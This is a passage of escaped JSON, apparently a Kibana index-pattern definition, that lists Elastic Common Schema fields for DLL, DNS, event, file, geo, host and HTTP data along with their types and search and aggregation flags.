\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.hash.sha512\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.pe.company\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.pe.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.pe.file_version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.pe.original_file_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.pe.product\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.answers.class\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.answers.data\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.answers.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.answers.ttl\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.answers.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.header_flags\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.op_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.question.class\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.question.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.question.registered_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.question.subdomain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.question.top_level_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.question.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.resolved_ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.response_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"ecs.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"error.stack_trace\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"error.stack_trace.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"error.stack_trace\"}}},{\"count\":0,\"name\":\"error.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.action\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.category\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.created\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.dataset\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.duration\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.end\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.ingested\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.kind\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.module\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"event.outcome\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.provider\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.risk_score\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.risk_score_norm\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.sequence\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.severity\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.start\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.timezone\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.url\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.accessed\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.attributes\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.code_signature.exists\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.code_signature.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.code_signature.subject_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.code_signature.trusted\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.code_signature.valid\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.created\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.ctime\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.device\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.directory\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.drive_letter\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.extension\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.gid\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.group\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.sha512\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.inode\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.mime_type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.mode\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.mtime\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.owner\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.path.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"file.path\"}}},{\"count\":0,\"name\":\"file.pe.company\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.pe.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.pe.file_version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.pe.original_file_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.pe.product\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.size\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.target_path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.target_path.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"file.target_path\"}}},{\"count\":0,\"name\":\"file.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.uid\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"hash.sha512\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.architecture\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.hostname\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.family\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.full.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"host.os.full\"}}},{\"count\":0,\"name\":\"host.os.kernel\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"host.os.name\"}}},{\"count\":0,\"name\":\"host.os.platform\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.uptime\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.full_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.full_name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"host.user.full_name\"}}},{\"count\":0,\"name\":\"host.user.group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"host.user.name\"}}},{\"count\":0,\"name\":\"http.request.body.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.request.body.content\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.request.body.content.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"http.request.body.content\"}}},{\"count\":0,\"name\":\"http.request.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.request.method\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.request.referrer\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.response.body.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.response.body.content\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.response.body.content.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"http.response.body.content\"}}},{\"count\":0,\"name\":\"http.response.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.response.status_code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"interface.alias\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"interface.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"